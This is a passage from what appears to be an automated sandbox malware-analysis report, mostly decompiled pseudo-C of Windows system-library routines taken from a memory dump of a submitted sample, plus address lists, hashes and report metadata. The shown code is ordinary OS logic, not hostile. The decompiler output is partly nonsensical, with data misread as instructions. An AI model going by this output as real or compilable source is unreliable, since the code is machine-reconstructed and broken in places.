									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t328;
												if(_t328 < 0) {
													L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t289 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x18a7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E017CEB70(__ecx, 0x18a79a0);
										__eax = _v52;
										L36:
										_pop(_t321);
										_pop(_t329);
										__eflags = _v8 ^ _t334;
										_pop(_t281);
										return E017FB640(_t218, _t281, _v8 ^ _t334, _t309, _t321, _t329);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L67();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L118;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t276 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t278 = E017E2E3E(_t276,  &_v36);
									_t289 = _v36;
									_v76 = _t278;
								}
								if(_t289 == 0) {
									goto L44;
								} else {
									_t280 = _t280 + 2 + _t289;
								}
								goto L14;
							case 6:
								__eax =  *0x18a5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x18a8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x18a8478;
									L90:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x18a6e58 & 0x0000ffff;
								__eax = ( *0x18a6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t320 = _t320 + 1;
								if(_t320 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L118;
						}
					}
					L56:
					_t294 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					if(__eflags > 0) {
						asm("o16 sub [esi+0x1], bh");
					}
					_t105 = _t327 + 1;
					 *_t105 =  *(_t327 + 1) - _t280;
					__eflags =  *_t105;
					asm("loopne 0x29");
					if(__eflags > 0) {
						if (__eflags <= 0) goto L62;
					}
					if(__eflags > 0) {
						_t327 = _t327 + 1;
						__eflags = _t327;
					}
					 *(_t327 + 1) =  *(_t327 + 1) - _t280;
					_pop(_t284);
					 *_t294 =  *_t294 + 0x94;
					 *(_t327 + 1) =  *(_t327 + 1) - _t284;
					 *(_t327 + 1) =  *(_t327 + 1) - _t322;
					 *(_t243 + 0x1f017e26 ^ 0x0201825b) =  *(_t243 + 0x1f017e26 ^ 0x0201825b) - 0x7e;
					_t330 = _t327 + _t327;
					__eflags = _t330;
					asm("daa");
					if(_t330 > 0) {
						_push(ds);
					}
					 *((intOrPtr*)(_t330 + 1)) =  *((intOrPtr*)(_t330 + 1)) - _t284;
					_t331 = _t330 - 1;
					_t115 = _t331 + 1;
					 *_t115 =  *(_t331 + 1) - _t284;
					__eflags =  *_t115;
					asm("daa");
					if( *_t115 > 0) {
						asm("fcomp dword [ebx-0x7e]");
					}
					_pop(_t285);
					 *_t294 =  *_t294 + 0xb4;
					 *(_t331 + 1) =  *(_t331 + 1) - _t285;
					 *_t294 =  *_t294 + 0xcc;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x188ff00);
					E0180D08C(_t285, _t322, _t331);
					_v44 =  *[fs:0x18];
					_t323 = 0;
					 *_a24 = 0;
					_t286 = _a12;
					__eflags = _t286;
					if(_t286 == 0) {
						_t249 = 0xc0000100;
					} else {
						_v8 = 0;
						_t332 = 0xc0000100;
						_v52 = 0xc0000100;
						_t251 = 4;
						while(1) {
							_v40 = _t251;
							__eflags = _t251;
							if(_t251 == 0) {
								break;
							}
							_t299 = _t251 * 0xc;
							_v48 = _t299;
							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x1791664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t266 = E017FE5C0(_a8,  *((intOrPtr*)(_t299 + 0x1791668)), _t286);
									_t338 = _t338 + 0xc;
									__eflags = _t266;
									if(__eflags == 0) {
										_t332 = E018351BE(_t286,  *((intOrPtr*)(_v48 + 0x179166c)), _a16, _t323, _t332, __eflags, _a20, _a24);
										_v52 = _t332;
										break;
									} else {
										_t251 = _v40;
										goto L72;
									}
									goto L80;
								} else {
									L72:
									_t251 = _t251 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t332;
						__eflags = _t332;
						if(_t332 < 0) {
							__eflags = _t332 - 0xc0000100;
							if(_t332 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t323;
									if( *_t295 == _t323) {
										_t332 = 0xc0000100;
										goto L86;
									} else {
										_t311 =  *((intOrPtr*)(_v44 + 0x30));
										_t253 =  *((intOrPtr*)(_t311 + 0x10));
										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t253 + 0x48)) == _t295) {
											__eflags =  *(_t311 + 0x1c);
											if( *(_t311 + 0x1c) == 0) {
												L116:
												_t332 = E017E2AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
												_v32 = _t332;
												__eflags = _t332 - 0xc0000100;
												if(_t332 != 0xc0000100) {
													goto L79;
												} else {
													_t323 = 1;
													_t295 = _v36;
													goto L85;
												}
											} else {
												_t256 = E017C6600( *(_t311 + 0x1c));
												__eflags = _t256;
												if(_t256 != 0) {
													goto L116;
												} else {
													_t295 = _a4;
													goto L85;
												}
											}
										} else {
											L85:
											_t332 = E017E2C50(_t295, _a8, _t286, _a16, _a20, _a24, _t323);
											L86:
											_v32 = _t332;
											goto L79;
										}
									}
									goto L118;
								} else {
									E017CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t332 = _a24;
									_t263 = E017E2AE4( &_v36, _a8, _t286, _a16, _a20, _t332);
									_v32 = _t263;
									__eflags = _t263 - 0xc0000100;
									if(_t263 == 0xc0000100) {
										_v32 = E017E2C50(_v36, _a8, _t286, _a16, _a20, _t332, 1);
									}
									_v8 = _t323;
									E017E2ACB();
								}
							}
						}
						L79:
						_v8 = 0xfffffffe;
						_t249 = _t332;
					}
					L80:
					return E0180D0D1(_t249);
				}
				L118:
			}





















































                                                    0x017e2584
                                                    0x017e2586
                                                    0x017e2590
                                                    0x017e2596
                                                    0x017e2597
                                                    0x017e2598
                                                    0x017e2599
                                                    0x017e259e
                                                    0x017e25a4
                                                    0x017e25a9
                                                    0x017e25ac
                                                    0x017e25ae
                                                    0x017e25b1
                                                    0x017e25b2
                                                    0x017e25b5
                                                    0x017e25b8
                                                    0x017e25bb
                                                    0x017e25bc
                                                    0x017e25bf
                                                    0x017e25c2
                                                    0x017e25c5
                                                    0x017e25c6
                                                    0x017e25cb
                                                    0x017e25ce
                                                    0x017e25d8
                                                    0x017e25db
                                                    0x017e25dd
                                                    0x017e25de
                                                    0x017e25e1
                                                    0x017e25e3
                                                    0x017e25e9
                                                    0x017e26da
                                                    0x017e26da
                                                    0x017e26dd
                                                    0x017e26e2
                                                    0x01825b56
                                                    0x00000000
                                                    0x017e26e8
                                                    0x017e26f9
                                                    0x017e26fb
                                                    0x017e26fe
                                                    0x017e2700
                                                    0x01825b60
                                                    0x00000000
                                                    0x017e2706
                                                    0x017e2706
                                                    0x017e270a
                                                    0x017e270a
                                                    0x017e270d
                                                    0x017e2713
                                                    0x017e2716
                                                    0x017e2718
                                                    0x017e271c
                                                    0x017e271e
                                                    0x01825b6c
                                                    0x01825b6f
                                                    0x01825b7f
                                                    0x01825b89
                                                    0x01825b8e
                                                    0x01825b93
                                                    0x01825b96
                                                    0x01825b9c
                                                    0x01825ba0
                                                    0x01825ba3
                                                    0x01825bab
                                                    0x01825bb0
                                                    0x01825bb3
                                                    0x01825bb3
                                                    0x01825ba3
                                                    0x017e2724
                                                    0x017e2726
                                                    0x017e2729
                                                    0x017e272c
                                                    0x017e279d
                                                    0x017e279d
                                                    0x017e27a0
                                                    0x017e27a2
                                                    0x00000000
                                                    0x017e272e
                                                    0x017e272e
                                                    0x017e2731
                                                    0x017e2734
                                                    0x017e2734
                                                    0x017e2736
                                                    0x01825bc1
                                                    0x01825bc1
                                                    0x01825bc4
                                                    0x00000000
                                                    0x01825bca
                                                    0x01825bca
                                                    0x01825bcd
                                                    0x00000000
                                                    0x01825bd3
                                                    0x00000000
                                                    0x01825bd3
                                                    0x01825bcd
                                                    0x017e273c
                                                    0x017e273c
                                                    0x017e2742
                                                    0x017e2747
                                                    0x017e274a
                                                    0x017e274d
                                                    0x017e2750
                                                    0x00000000
                                                    0x017e2756
                                                    0x017e2756
                                                    0x00000000
                                                    0x017e2902
                                                    0x017e2908
                                                    0x017e290b
                                                    0x00000000
                                                    0x017e2911
                                                    0x017e291c
                                                    0x017e2921
                                                    0x00000000
                                                    0x017e2921
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2880
                                                    0x017e2887
                                                    0x017e288c
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2805
                                                    0x017e280a
                                                    0x017e2814
                                                    0x017e2816
                                                    0x00000000
                                                    0x00000000
                                                    0x017e281e
                                                    0x017e2821
                                                    0x017e2823
                                                    0x00000000
                                                    0x017e2829
                                                    0x017e2829
                                                    0x017e2831
                                                    0x017e283c
                                                    0x017e283e
                                                    0x00000000
                                                    0x017e283e
                                                    0x00000000
                                                    0x00000000
                                                    0x017e284e
                                                    0x017e2850
                                                    0x017e2851
                                                    0x017e2854
                                                    0x017e2857
                                                    0x017e285a
                                                    0x017e285c
                                                    0x017e285d
                                                    0x00000000
                                                    0x00000000
                                                    0x017e275d
                                                    0x017e2761
                                                    0x00000000
                                                    0x017e2767
                                                    0x017e276e
                                                    0x017e2773
                                                    0x017e2773
                                                    0x017e2776
                                                    0x017e2778
                                                    0x017e277e
                                                    0x017e277e
                                                    0x017e2781
                                                    0x017e2781
                                                    0x017e2783
                                                    0x017e2784
                                                    0x00000000
                                                    0x00000000
                                                    0x01825bd8
                                                    0x01825bde
                                                    0x01825be4
                                                    0x01825be6
                                                    0x01825be8
                                                    0x01825be9
                                                    0x01825bee
                                                    0x01825bf8
                                                    0x01825bff
                                                    0x01825c01
                                                    0x01825c04
                                                    0x01825c07
                                                    0x01825c0b
                                                    0x01825c0d
                                                    0x01825c0d
                                                    0x01825c15
                                                    0x01825c18
                                                    0x01825c1b
                                                    0x01825c1b
                                                    0x01825c1e
                                                    0x00000000
                                                    0x00000000
                                                    0x017e28c3
                                                    0x017e28c8
                                                    0x017e28d2
                                                    0x017e28d4
                                                    0x017e28d8
                                                    0x017e28db
                                                    0x01825c26
                                                    0x01825c28
                                                    0x01825c2d
                                                    0x01825c2d
                                                    0x00000000
                                                    0x00000000
                                                    0x01825c34
                                                    0x01825c36
                                                    0x01825c49
                                                    0x01825c4e
                                                    0x01825c54
                                                    0x01825c5b
                                                    0x01825c5d
                                                    0x01825c60
                                                    0x017e2788
                                                    0x017e2788
                                                    0x017e278b
                                                    0x017e278e
                                                    0x017e278e
                                                    0x017e278e
                                                    0x017e2791
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2756
                                                    0x017e2750
                                                    0x00000000
                                                    0x017e2794
                                                    0x017e2794
                                                    0x017e2795
                                                    0x017e2798
                                                    0x017e2798
                                                    0x00000000
                                                    0x017e2734
                                                    0x017e272c
                                                    0x017e2700
                                                    0x017e25ef
                                                    0x017e25ef
                                                    0x017e25ef
                                                    0x017e25f2
                                                    0x017e25f8
                                                    0x00000000
                                                    0x00000000
                                                    0x017e25fe
                                                    0x00000000
                                                    0x017e28e6
                                                    0x017e28ec
                                                    0x017e28ef
                                                    0x017e28f5
                                                    0x017e28f8
                                                    0x017e28f8
                                                    0x00000000
                                                    0x017e28f8
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2866
                                                    0x017e2866
                                                    0x017e2876
                                                    0x017e2879
                                                    0x00000000
                                                    0x00000000
                                                    0x017e27e0
                                                    0x017e27e7
                                                    0x017e27e9
                                                    0x017e27eb
                                                    0x01825afd
                                                    0x00000000
                                                    0x01825afd
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2633
                                                    0x017e2638
                                                    0x017e263b
                                                    0x017e263c
                                                    0x017e263e
                                                    0x017e2640
                                                    0x017e2642
                                                    0x017e2647
                                                    0x017e2649
                                                    0x017e264e
                                                    0x017e2650
                                                    0x017e2653
                                                    0x017e2659
                                                    0x017e26a2
                                                    0x017e26a7
                                                    0x017e26ac
                                                    0x017e26b2
                                                    0x01825b11
                                                    0x01825b15
                                                    0x01825b17
                                                    0x00000000
                                                    0x017e26b8
                                                    0x017e26b8
                                                    0x017e26ba
                                                    0x017e27a6
                                                    0x017e27a6
                                                    0x017e27a9
                                                    0x017e27ab
                                                    0x017e27b9
                                                    0x017e27b9
                                                    0x017e27be
                                                    0x017e27c1
                                                    0x017e27c3
                                                    0x017e27c5
                                                    0x017e27c7
                                                    0x01825c74
                                                    0x01825c79
                                                    0x01825c79
                                                    0x017e27c7
                                                    0x00000000
                                                    0x017e26c0
                                                    0x017e26c0
                                                    0x017e26c3
                                                    0x017e26c6
                                                    0x017e26c6
                                                    0x017e26c9
                                                    0x017e26c9
                                                    0x00000000
                                                    0x017e26c9
                                                    0x017e26ba
                                                    0x017e265b
                                                    0x017e265b
                                                    0x017e265e
                                                    0x017e2667
                                                    0x017e266d
                                                    0x017e2677
                                                    0x017e267c
                                                    0x017e267f
                                                    0x017e2681
                                                    0x01825b49
                                                    0x01825b4e
                                                    0x017e27cd
                                                    0x017e27d0
                                                    0x017e27d1
                                                    0x017e27d2
                                                    0x017e27d4
                                                    0x017e27dd
                                                    0x017e2687
                                                    0x017e2687
                                                    0x017e268a
                                                    0x017e268b
                                                    0x017e268e
                                                    0x017e268f
                                                    0x017e2691
                                                    0x017e2696
                                                    0x017e2698
                                                    0x017e269d
                                                    0x017e269f
                                                    0x00000000
                                                    0x017e269f
                                                    0x017e2681
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2846
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2605
                                                    0x017e260a
                                                    0x017e260c
                                                    0x017e2611
                                                    0x017e2616
                                                    0x017e2619
                                                    0x017e2619
                                                    0x017e261e
                                                    0x00000000
                                                    0x017e2624
                                                    0x017e2627
                                                    0x017e2627
                                                    0x00000000
                                                    0x00000000
                                                    0x01825b1f
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2894
                                                    0x017e289b
                                                    0x017e289d
                                                    0x017e28a1
                                                    0x01825b2b
                                                    0x01825b2e
                                                    0x01825b2e
                                                    0x017e28a7
                                                    0x017e28a9
                                                    0x01825b04
                                                    0x01825b09
                                                    0x01825b09
                                                    0x01825b09
                                                    0x00000000
                                                    0x00000000
                                                    0x01825b35
                                                    0x01825b3c
                                                    0x017e28fb
                                                    0x017e28fb
                                                    0x017e26cc
                                                    0x017e26cc
                                                    0x017e26d0
                                                    0x00000000
                                                    0x017e26d2
                                                    0x017e26d2
                                                    0x00000000
                                                    0x017e26d2
                                                    0x00000000
                                                    0x00000000
                                                    0x017e25fe
                                                    0x017e292d
                                                    0x017e292f
                                                    0x017e2930
                                                    0x017e2935
                                                    0x017e2937
                                                    0x017e2939
                                                    0x017e2939
                                                    0x017e293a
                                                    0x017e293a
                                                    0x017e293a
                                                    0x017e293d
                                                    0x017e293f
                                                    0x017e2941
                                                    0x017e2941
                                                    0x017e2942
                                                    0x017e2945
                                                    0x017e2945
                                                    0x017e2945
                                                    0x017e2946
                                                    0x017e294e
                                                    0x017e294f
                                                    0x017e2952
                                                    0x017e295a
                                                    0x017e295d
                                                    0x017e2960
                                                    0x017e2960
                                                    0x017e2962
                                                    0x017e2963
                                                    0x017e2965
                                                    0x017e2965
                                                    0x017e2966
                                                    0x017e2969
                                                    0x017e296a
                                                    0x017e296a
                                                    0x017e296a
                                                    0x017e296e
                                                    0x017e296f
                                                    0x017e2971
                                                    0x017e2971
                                                    0x017e2972
                                                    0x017e2973
                                                    0x017e2976
                                                    0x017e297b
                                                    0x017e297e
                                                    0x017e297f
                                                    0x017e2980
                                                    0x017e2981
                                                    0x017e2982
                                                    0x017e2983
                                                    0x017e2984
                                                    0x017e2985
                                                    0x017e2986
                                                    0x017e2987
                                                    0x017e2988
                                                    0x017e2989
                                                    0x017e298a
                                                    0x017e298b
                                                    0x017e298c
                                                    0x017e298d
                                                    0x017e298e
                                                    0x017e298f
                                                    0x017e2990
                                                    0x017e2992
                                                    0x017e2997
                                                    0x017e29a3
                                                    0x017e29a6
                                                    0x017e29ab
                                                    0x017e29ad
                                                    0x017e29b0
                                                    0x017e29b2
                                                    0x01825c80
                                                    0x017e29b8
                                                    0x017e29b8
                                                    0x017e29bb
                                                    0x017e29c0
                                                    0x017e29c5
                                                    0x017e29c6
                                                    0x017e29c6
                                                    0x017e29c9
                                                    0x017e29cb
                                                    0x00000000
                                                    0x00000000
                                                    0x017e29cd
                                                    0x017e29d0
                                                    0x017e29d9
                                                    0x017e29db
                                                    0x017e29dd
                                                    0x017e2a7f
                                                    0x017e2a84
                                                    0x017e2a87
                                                    0x017e2a89
                                                    0x01825ca1
                                                    0x01825ca3
                                                    0x00000000
                                                    0x017e2a8f
                                                    0x017e2a8f
                                                    0x00000000
                                                    0x017e2a8f
                                                    0x00000000
                                                    0x017e29e3
                                                    0x017e29e3
                                                    0x017e29e3
                                                    0x00000000
                                                    0x017e29e3
                                                    0x017e29dd
                                                    0x00000000
                                                    0x017e29db
                                                    0x017e29e6
                                                    0x017e29e9
                                                    0x017e29eb
                                                    0x017e29ed
                                                    0x017e29f3
                                                    0x017e29f5
                                                    0x017e29f8
                                                    0x017e29fa
                                                    0x017e2a97
                                                    0x017e2a9a
                                                    0x017e2a9d
                                                    0x017e2add
                                                    0x00000000
                                                    0x017e2a9f
                                                    0x017e2aa2
                                                    0x017e2aa5
                                                    0x017e2aa8
                                                    0x017e2aab
                                                    0x01825cab
                                                    0x01825caf
                                                    0x01825cc5
                                                    0x01825cda
                                                    0x01825cdc
                                                    0x01825cdf
                                                    0x01825ce5
                                                    0x00000000
                                                    0x01825ceb
                                                    0x01825ced
                                                    0x01825cee
                                                    0x00000000
                                                    0x01825cee
                                                    0x01825cb1
                                                    0x01825cb4
                                                    0x01825cb9
                                                    0x01825cbb
                                                    0x00000000
                                                    0x01825cbd
                                                    0x01825cbd
                                                    0x00000000
                                                    0x01825cbd
                                                    0x01825cbb
                                                    0x017e2ab1
                                                    0x017e2ab1
                                                    0x017e2ac4
                                                    0x017e2ac6
                                                    0x017e2ac6
                                                    0x00000000
                                                    0x017e2ac6
                                                    0x017e2aab
                                                    0x00000000
                                                    0x017e2a00
                                                    0x017e2a09
                                                    0x017e2a0e
                                                    0x017e2a21
                                                    0x017e2a24
                                                    0x017e2a35
                                                    0x017e2a3a
                                                    0x017e2a3d
                                                    0x017e2a42
                                                    0x017e2a59
                                                    0x017e2a59
                                                    0x017e2a5c
                                                    0x017e2a5f
                                                    0x017e2a5f
                                                    0x017e29fa
                                                    0x017e29f3
                                                    0x017e2a64
                                                    0x017e2a64
                                                    0x017e2a6b
                                                    0x017e2a6b
                                                    0x017e2a6d
                                                    0x017e2a72
                                                    0x017e2a72
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PATH
                                                    • API String ID: 0-1036084923
                                                    • Opcode ID: fe3187eee5fd00f120956a44b04921db18ae38cc26305936d718e6765e634537
                                                    • Instruction ID: 0a3c40c3745b0caa42dba7d4cc9d4065653a9ef8da168e0560561854f43ed006
                                                    • Opcode Fuzzy Hash: fe3187eee5fd00f120956a44b04921db18ae38cc26305936d718e6765e634537
                                                    • Instruction Fuzzy Hash: F4C19EB1D40219DBDB25DFA8D885BAEFBF9FF48750F484029E601AB251DB34A941CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E017EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E017CEEF0(0x18a7b60);
					_t134 =  *0x18a7b84; // 0x77e17b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x18a7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x18a7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E017C6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E017C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01858938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E017BB150();
													}
													_t116 = E01856D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E017C75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x18a8638; // 0x0
																	_t122 = L017C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E017C76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E017C76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L017EFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E017EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E017EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E017EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E017EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E017EFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
